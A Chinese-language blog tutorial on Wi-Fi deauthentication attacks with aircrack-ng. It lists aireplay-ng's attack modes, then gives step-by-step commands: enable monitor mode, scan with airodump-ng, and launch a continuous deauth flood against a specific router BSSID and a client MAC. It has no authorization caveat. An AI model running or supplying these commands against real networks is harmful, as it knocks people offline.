【教程】Aireplay-ng解除认证攻击

aireplay-ng洪水攻击


Aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,数据包嗅探,WEPWPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持监听模式的无线网卡上(设备列表请参阅其官方网站)并嗅探802.11a802.11b802.11g的数据。该程序可运行在LinuxWindows上。他的功能与WiFi杀手一样


攻击类型:

    Attack 0:解除认证攻击
    Attack 1:伪造认证攻击
    Attack 2:交互式注入攻击
    Attack 3:ARP请求包重放攻击
    Attack 4:chopchop Korek攻击
    Attack 5:碎片交错攻击
    Attack 6:Cafe-latte 攻击
    Attack 7:面向客户的碎片攻击
    Attack 8:WPA迁移模式
    Attack 9:数据包注入测试
在本次实验中使用的是解除认证攻击

1.查看网卡信息

iwconfig

2.启用监听模式

ip link set wlan0 down
//关闭服务
iw wlan0 set type monitor
//开启监听模式
ip link wlan0 up
//打开服务
iw dev
//查看配置

3.开始监听,攻击对象为 D-Lin。这里需要留意 BSSID,CH,ESSID.

airodump-ng -i wlan0

4.将CH(频道)设置为与攻击对象一致。

iw wlan0 set channel 2
iw dev

5.获取路由连接设备

airodump-ng -i wlan0 --bssid B0:C5:54:81:C2:3C

6.开始攻击,这里的 -0 0指解除认证攻击并持续攻击,-a 后跟攻击对象网关的BSSID(MAC). -c 后跟攻击用户STATION.

aireplay-ng -0 0 -a B0:C5:54:81:C2:3C wlan0
//攻击整个路由
aireplay-ng -0 0 -a B0:C5:54:81:C2:3C -c D8:63:75:82:72:8A wlan0
//攻击指定用户
本博客所有文章如无特别注明均为原创。作者:KING复制或转载请以超链接形式注明转自 千世博客
原文地址《【教程】Aireplay-ng解除认证攻击
分享到:更多

相关推荐

发表评论

路人甲 表情
看不清楚?点图切换 Ctrl+Enter快速提交

网友评论(0)